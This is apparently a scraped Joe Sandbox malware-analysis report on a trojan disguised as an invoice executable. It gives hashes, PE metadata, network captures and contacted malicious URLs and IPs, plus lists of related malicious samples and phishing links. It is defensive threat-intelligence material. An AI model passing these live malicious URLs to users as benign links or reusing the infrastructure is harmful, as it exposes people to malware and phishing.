                		unknownfalse
                  		high
                  www.kornteengoods.com
                  		unknown
                  		unknowntrue
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://www.asacal.com/jqc/?JfEtEZgp=cE9UUOc3pLPT0LAdHSIP3evlMF3IBhbdmq5wG0CQLEBsctkiCkQzhS7S4EgmhhRecsIvRlsotA==&ojq0s=RzulsDtrue
                    • Avira URL Cloud: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000003.00000002.604467265.000000000095C000.00000004.00000020.sdmpfalse
                      		high
                      http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmpfalse
                        		high
                        http://www.fontbureau.comexplorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmpfalse
                          		high
                          http://www.fontbureau.com/designersGexplorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmpfalse
                            		high
                            http://www.fontbureau.com/designers/?explorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmpfalse
                              		high
                              http://www.founder.com.cn/cn/bTheexplorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.fontbureau.com/designers?explorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmpfalse
                                		high
                                http://www.tiro.comexplorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.fontbureau.com/designersexplorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmpfalse
                                  		high
                                  http://www.goodfont.co.krexplorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.carterandcone.comlexplorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.sajatypeworks.comexplorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.typography.netDexplorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmpfalse
                                    		high
                                    http://www.founder.com.cn/cn/cTheexplorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://fontfabrik.comexplorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.founder.com.cn/cnexplorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmpfalse
                                      		high
                                      http://www.jiyu-kobo.co.jp/explorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.fontbureau.com/designers8explorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmpfalse
                                        		high
                                        http://www.fonts.comexplorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmpfalse
                                          		high
                                          http://www.sandoll.co.krexplorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.urwpp.deDPleaseexplorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.zhongyicts.com.cnexplorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.sakkal.comexplorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown

                                          Contacted IPs

                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs

                                          Public

                                          IPDomainCountryFlagASNASN NameMalicious
                                          156.241.53.196
                                          		unknownSeychelles
                                          		136800XIAOZHIYUN1-AS-APICIDCNETWORKUStrue
                                          198.54.117.244
                                          		unknownUnited States
                                          		22612NAMECHEAP-NETUStrue

                                          Private

                                          IP
                                          192.168.2.1

                                          General Information

                                          Joe Sandbox Version:31.0.0 Red Diamond
                                          Analysis ID:323028
                                          Start date:26.11.2020
                                          Start time:08:27:30
                                          Joe Sandbox Product:CloudBasic
                                          Overall analysis duration:0h 9m 13s
                                          Hypervisor based Inspection enabled:false
                                          Report type:light
                                          Sample file name:PT300975-inv.exe
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                          Number of analysed new started processes analysed:22
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:1
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • HDC enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Detection:MAL
                                          Classification:mal100.troj.evad.winEXE@7/1@5/3
                                          EGA Information:Failed
                                          HDC Information:
                                          • Successful, ratio: 37.7% (good quality ratio 34.6%)
                                          • Quality average: 73.5%
                                          • Quality standard deviation: 30.8%
                                          HCA Information:
                                          • Successful, ratio: 100%
                                          • Number of executed functions: 0
                                          • Number of non-executed functions: 0
                                          Cookbook Comments:
                                          • Adjust boot time
                                          • Enable AMSI
                                          • Found application associated with file extension: .exe
                                          Warnings:
                                          Show All
                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                          • Excluded IPs from analysis (whitelisted): 104.43.193.48, 13.64.90.137, 168.61.161.212, 51.104.144.132, 8.241.122.126, 67.26.139.254, 8.248.113.254, 8.253.95.249, 67.27.234.126, 51.103.5.186, 52.155.217.156, 20.54.26.129, 52.142.114.176, 92.122.213.247, 92.122.213.194, 23.210.248.85
                                          • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, wns.notify.windows.com.akadns.net, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, g-msn-com-nsatc.trafficmanager.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, par02p.wns.notify.windows.com.akadns.net, emea1.notify.windows.com.akadns.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, client.wns.windows.com, fs.microsoft.com, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net

                                          Simulations

                                          Behavior and APIs

                                          TimeTypeDescription
                                          08:28:25API Interceptor1x Sleep call for process: PT300975-inv.exe modified

                                          Joe Sandbox View / Context

                                          IPs

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          198.54.117.244test.jsGet hashmaliciousBrowse
                                          • 101legit.com/0.html
                                          dsexplrob.exeGet hashmaliciousBrowse
                                          • i3mode.com/dbExpressversion/db87987Administrator.php?b=FKfEZOAdYedIVNeAlGKbCgFzoODmhh
                                          nbmvwchp.jsGet hashmaliciousBrowse
                                          • 101legit.com/0.html

                                          Domains

                                          No context

                                          ASN

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          XIAOZHIYUN1-AS-APICIDCNETWORKUSanthon.exeGet hashmaliciousBrowse
                                          • 156.241.53.168
                                          RFQ For TRANS ANATOLIAN NATURAL GAS PIPELINE (TANAP) - PHASE 1(Package 2).exeGet hashmaliciousBrowse
                                          • 156.241.53.195
                                          Inv.exeGet hashmaliciousBrowse
                                          • 156.241.53.9
                                          Shipping Documents (INV,PL,BL)_pdf.exeGet hashmaliciousBrowse
                                          • 156.224.66.93
                                          Purchase Order 40,7045$.exeGet hashmaliciousBrowse
                                          • 45.207.121.138
                                          Invoice.exeGet hashmaliciousBrowse
                                          • 156.241.53.234
                                          hjKM0s7CWW.exeGet hashmaliciousBrowse
                                          • 45.207.121.138
                                          n4uladudJS.exeGet hashmaliciousBrowse
                                          • 45.207.121.138
                                          T66DUJYHQE.exeGet hashmaliciousBrowse
                                          • 45.207.121.138
                                          #U5341#U4e00#U6708#U4efd#U516c#U53f8#U503c#U73ed#U4eba#U5458#U8c03#U73ed#U901a#U77e5.exeGet hashmaliciousBrowse
                                          • 156.253.88.154
                                          9qB3tPamJa.exeGet hashmaliciousBrowse
                                          • 156.253.114.216
                                          zYUJ3b5gQF.exeGet hashmaliciousBrowse
                                          • 45.207.121.138
                                          Purchase Order 40,7045$.exeGet hashmaliciousBrowse
                                          • 45.207.121.138
                                          RNM56670112.exeGet hashmaliciousBrowse
                                          • 156.225.160.251
                                          PpCVLJxsOp.exeGet hashmaliciousBrowse
                                          • 154.210.136.219
                                          PO PL.exeGet hashmaliciousBrowse
                                          • 156.254.247.54
                                          1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeGet hashmaliciousBrowse
                                          • 156.254.221.125
                                          3BJGa7Xw4ugPpll.exeGet hashmaliciousBrowse
                                          • 23.248.240.227
                                          y20dxdW3GQ.exeGet hashmaliciousBrowse
                                          • 23.235.182.106
                                          J3ae2JBEng.exeGet hashmaliciousBrowse
                                          • 45.207.118.132
                                          NAMECHEAP-NETUSPR24869408-V2.PDF.exeGet hashmaliciousBrowse
                                          • 198.54.122.60
                                          https://dhumketubd.com/DifferenceCard/login.phpGet hashmaliciousBrowse
                                          • 198.54.117.200
                                          vnaSKDMnLG.dllGet hashmaliciousBrowse
                                          • 63.250.47.200
                                          ATT59829.htmGet hashmaliciousBrowse
                                          • 198.54.115.249
                                          PO EME39134.xlsxGet hashmaliciousBrowse
                                          • 63.250.38.18
                                          https://www.ebhadhara.com/ova/office365/YWp1bm5hcmthckBrcm9sbGJvbmRyYXRpbmdzLmNvbQ0%3DGet hashmaliciousBrowse
                                          • 199.192.28.206
                                          FxzOwcXb7x.exeGet hashmaliciousBrowse
                                          • 198.54.122.60
                                          7OKYiP6gHy.exeGet hashmaliciousBrowse
                                          • 198.54.117.217
                                          ptFIhqUe89.exeGet hashmaliciousBrowse
                                          • 63.250.38.18
                                          Yarranton.co.uk.htmGet hashmaliciousBrowse
                                          • 199.188.200.218
                                          PO#010-240.exeGet hashmaliciousBrowse
                                          • 162.213.255.53
                                          PO_010-240.exeGet hashmaliciousBrowse
                                          • 162.213.255.53
                                          EME.39134.xlsxGet hashmaliciousBrowse
                                          • 63.250.38.18
                                          http://omivjsyyqzyxfria.riantscapital.com/kampo/anNhY2tldHRAYWR2ZW50aXN0aGVhbHRoY2FyZS5jb20=Get hashmaliciousBrowse
                                          • 198.54.120.245
                                          https://1drv.ms/u/s!Ap6-6LFn1rzXgTxzc-81jQs8opJO?e=EhEGR5Get hashmaliciousBrowse
                                          • 198.54.120.226
                                          n830467925857.xlsmGet hashmaliciousBrowse
                                          • 199.192.21.36
                                          new quotation order.exeGet hashmaliciousBrowse
                                          • 198.54.117.216
                                          NEW ORDER.exeGet hashmaliciousBrowse
                                          • 198.54.122.60
                                          n830467925857.xlsmGet hashmaliciousBrowse
                                          • 199.192.21.36
                                          ATT96626.htmGet hashmaliciousBrowse
                                          • 198.54.115.249

                                          JA3 Fingerprints

                                          No context

                                          Dropped Files

                                          No context

                                          Created / dropped Files

                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PT300975-inv.exe.log
                                          Process:C:\Users\user\Desktop\PT300975-inv.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):1636
                                          Entropy (8bit):5.344107669812469
                                          Encrypted:false
                                          SSDEEP:48:MxHKXeHKlEHU0YHKhQnouHIW7HKjovjHKx1qHLHKs:iqXeqm00YqhQnouRqjorqxwrqs
                                          MD5:BF1A4BABF3E94AA2F0BED4C55E050B13
                                          SHA1:433EA392F97D828DCA9CC9C080B99D40063CDF50
                                          SHA-256:B74F8FCBDD8A649F2073373BD471F685A14629E7C2DE97C445F60414CBF61B9E
                                          SHA-512:C6D0F73205F524F3DDC9A7211BA07E28A02334AD462DAD893FFF90D5AA9723C09185B6ACF78CEF1C1300CD492FA3AF9C2FCADA18934D73C0CA87B18CC42D0976
                                          Malicious:true
                                          Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\820a27781e8540ca263d835ec155f1a5\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\889128adc9a7c9370e5e293f65060164\PresentationFramework.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Wi

                                          Static File Info

                                          General

                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Entropy (8bit):6.285704309931807
                                          TrID:
                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                          • Win32 Executable (generic) a (10002005/4) 49.78%
                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                          • DOS Executable Generic (2002/1) 0.01%
                                          File name:PT300975-inv.exe
                                          File size:559616
                                          MD5:025544a9014cf1667e8a1d4ff68da253
                                          SHA1:0123853e7960cdae4f3ad95945b4ec86adbb93c6
                                          SHA256:2858bfcb9388b05049df45459ee60bf96be0b0d75a3be34cf3c00f57ec9f4469
                                          SHA512:a22db404c3a154339b3cd6d4a4227f319f6cb99d103346856ffd6fd249fe08bace4f528f185edc25c0672ae03b2e14c87b31b0b2d0728372c5893821b5a43068
                                          SSDEEP:6144:3cMR5P4uE1KMtqm/0XWJYoukAlD0o2c3zZOaoRzkZRjdnLor7/7Sr9sTFaOxSxyy:3n5PqttqmMGJYvlxzgaoG3dnG7SeG2+
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L... ;.F.................~............... ........@.. ....................................`................................

                                          File Icon

                                          Icon Hash:00828e8e8686b000

                                          Static PE Info

                                          General

                                          Entrypoint:0x489c9e
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                          DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
                                          Time Stamp:0x46D33B20 [Mon Aug 27 20:59:12 2007 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:v4.0.30319
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                          Entrypoint Preview

                                          Instruction
                                          jmp dword ptr [00402000h]
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al

                                          Data Directories

                                          NameVirtual AddressVirtual Size Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x89c440x57.text
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x8a0000x622.rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x8c0000xc.reloc
                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                          Sections

                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                          .text0x20000x87ca40x87e00False0.583592671918data6.29806430778IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                          .rsrc0x8a0000x6220x800False0.353515625data3.65274067017IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .reloc0x8c0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                          Resources

                                          NameRVASizeTypeLanguageCountry
                                          RT_VERSION0x8a0a00x398data
                                          RT_MANIFEST0x8a4380x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                          Imports

                                          DLLImport
                                          mscoree.dll_CorExeMain

                                          Version Infos

                                          DescriptionData
                                          Translation0x0000 0x04b0
                                          LegalCopyrightCopyright 2010 F7G5?9JAF>2=>JA7AIB2F
                                          Assembly Version1.0.0.0
                                          InternalNameuse5.exe
                                          FileVersion7.10.14.17
                                          CompanyNameF7G5?9JAF>2=>JA7AIB2F
                                          Comments:6;C>4;FA4F5DH9D@88B;3
                                          ProductName5G5C9985D<<?=>@B5@
                                          ProductVersion7.10.14.17
                                          FileDescription5G5C9985D<<?=>@B5@
                                          OriginalFilenameuse5.exe

                                          Network Behavior

                                          Network Port Distribution

                                          TCP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Nov 26, 2020 08:29:26.744565964 CET4975080192.168.2.6198.54.117.244
                                          Nov 26, 2020 08:29:26.911395073 CET8049750198.54.117.244192.168.2.6
                                          Nov 26, 2020 08:29:26.911807060 CET4975080192.168.2.6198.54.117.244
                                          Nov 26, 2020 08:29:26.911973953 CET4975080192.168.2.6198.54.117.244
                                          Nov 26, 2020 08:29:27.078738928 CET8049750198.54.117.244192.168.2.6
                                          Nov 26, 2020 08:29:27.078759909 CET8049750198.54.117.244192.168.2.6
                                          Nov 26, 2020 08:30:08.408441067 CET4975580192.168.2.6156.241.53.196
                                          Nov 26, 2020 08:30:08.610635996 CET8049755156.241.53.196192.168.2.6
                                          Nov 26, 2020 08:30:08.610830069 CET4975580192.168.2.6156.241.53.196
                                          Nov 26, 2020 08:30:08.610979080 CET4975580192.168.2.6156.241.53.196
                                          Nov 26, 2020 08:30:08.813050032 CET8049755156.241.53.196192.168.2.6
                                          Nov 26, 2020 08:30:09.102338076 CET4975580192.168.2.6156.241.53.196
                                          Nov 26, 2020 08:30:09.292335033 CET8049755156.241.53.196192.168.2.6
                                          Nov 26, 2020 08:30:09.292357922 CET8049755156.241.53.196192.168.2.6
                                          Nov 26, 2020 08:30:09.292530060 CET4975580192.168.2.6156.241.53.196
                                          Nov 26, 2020 08:30:09.292561054 CET4975580192.168.2.6156.241.53.196
                                          Nov 26, 2020 08:30:09.304438114 CET8049755156.241.53.196192.168.2.6
                                          Nov 26, 2020 08:30:09.304570913 CET4975580192.168.2.6156.241.53.196

                                          UDP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Nov 26, 2020 08:28:19.663137913 CET5602353192.168.2.68.8.8.8
                                          Nov 26, 2020 08:28:19.690159082 CET53560238.8.8.8192.168.2.6
                                          Nov 26, 2020 08:28:20.626461029 CET5838453192.168.2.68.8.8.8
                                          Nov 26, 2020 08:28:20.653572083 CET53583848.8.8.8192.168.2.6
                                          Nov 26, 2020 08:28:21.668230057 CET6026153192.168.2.68.8.8.8
                                          Nov 26, 2020 08:28:21.695391893 CET53602618.8.8.8192.168.2.6
                                          Nov 26, 2020 08:28:22.580018997 CET5606153192.168.2.68.8.8.8
                                          Nov 26, 2020 08:28:22.607135057 CET53560618.8.8.8192.168.2.6
                                          Nov 26, 2020 08:28:23.502145052 CET5833653192.168.2.68.8.8.8
                                          Nov 26, 2020 08:28:23.529290915 CET53583368.8.8.8192.168.2.6
                                          Nov 26, 2020 08:28:25.972165108 CET5378153192.168.2.68.8.8.8
                                          Nov 26, 2020 08:28:25.999289989 CET53537818.8.8.8192.168.2.6
                                          Nov 26, 2020 08:28:27.134497881 CET5406453192.168.2.68.8.8.8
                                          Nov 26, 2020 08:28:27.161614895 CET53540648.8.8.8192.168.2.6
                                          Nov 26, 2020 08:28:28.241576910 CET5281153192.168.2.68.8.8.8
                                          Nov 26, 2020 08:28:28.268699884 CET53528118.8.8.8192.168.2.6
                                          Nov 26, 2020 08:28:29.477148056 CET5529953192.168.2.68.8.8.8
                                          Nov 26, 2020 08:28:29.504374981 CET53552998.8.8.8192.168.2.6
                                          Nov 26, 2020 08:28:31.500103951 CET6374553192.168.2.68.8.8.8
                                          Nov 26, 2020 08:28:31.527142048 CET53637458.8.8.8192.168.2.6
                                          Nov 26, 2020 08:28:34.086605072 CET5005553192.168.2.68.8.8.8
                                          Nov 26, 2020 08:28:34.113698959 CET53500558.8.8.8192.168.2.6
                                          Nov 26, 2020 08:28:37.824050903 CET6137453192.168.2.68.8.8.8
                                          Nov 26, 2020 08:28:37.851146936 CET53613748.8.8.8192.168.2.6
                                          Nov 26, 2020 08:28:38.843249083 CET5033953192.168.2.68.8.8.8
                                          Nov 26, 2020 08:28:38.870150089 CET53503398.8.8.8192.168.2.6
                                          Nov 26, 2020 08:28:40.249627113 CET6330753192.168.2.68.8.8.8
                                          Nov 26, 2020 08:28:40.276679039 CET53633078.8.8.8192.168.2.6
                                          Nov 26, 2020 08:28:49.056457043 CET4969453192.168.2.68.8.8.8
                                          Nov 26, 2020 08:28:49.083647013 CET53496948.8.8.8192.168.2.6
                                          Nov 26, 2020 08:29:05.741004944 CET5498253192.168.2.68.8.8.8
                                          Nov 26, 2020 08:29:05.768177986 CET53549828.8.8.8192.168.2.6
                                          Nov 26, 2020 08:29:07.180556059 CET5001053192.168.2.68.8.8.8
                                          Nov 26, 2020 08:29:07.217647076 CET53500108.8.8.8192.168.2.6
                                          Nov 26, 2020 08:29:11.676465988 CET6371853192.168.2.68.8.8.8
                                          Nov 26, 2020 08:29:11.726603985 CET53637188.8.8.8192.168.2.6
                                          Nov 26, 2020 08:29:12.470824003 CET6211653192.168.2.68.8.8.8
                                          Nov 26, 2020 08:29:12.506289005 CET53621168.8.8.8192.168.2.6
                                          Nov 26, 2020 08:29:12.947566032 CET6381653192.168.2.68.8.8.8
                                          Nov 26, 2020 08:29:12.995899916 CET53638168.8.8.8192.168.2.6
                                          Nov 26, 2020 08:29:13.324655056 CET5501453192.168.2.68.8.8.8
                                          Nov 26, 2020 08:29:13.376000881 CET53550148.8.8.8192.168.2.6
                                          Nov 26, 2020 08:29:13.761892080 CET6220853192.168.2.68.8.8.8
                                          Nov 26, 2020 08:29:13.797600031 CET53622088.8.8.8192.168.2.6
                                          Nov 26, 2020 08:29:14.079472065 CET5757453192.168.2.68.8.8.8
                                          Nov 26, 2020 08:29:14.130125999 CET53575748.8.8.8192.168.2.6
                                          Nov 26, 2020 08:29:14.193630934 CET5181853192.168.2.68.8.8.8
                                          Nov 26, 2020 08:29:14.231434107 CET53518188.8.8.8192.168.2.6
                                          Nov 26, 2020 08:29:14.714554071 CET5662853192.168.2.68.8.8.8
                                          Nov 26, 2020 08:29:14.751116037 CET53566288.8.8.8192.168.2.6
                                          Nov 26, 2020 08:29:15.363802910 CET6077853192.168.2.68.8.8.8
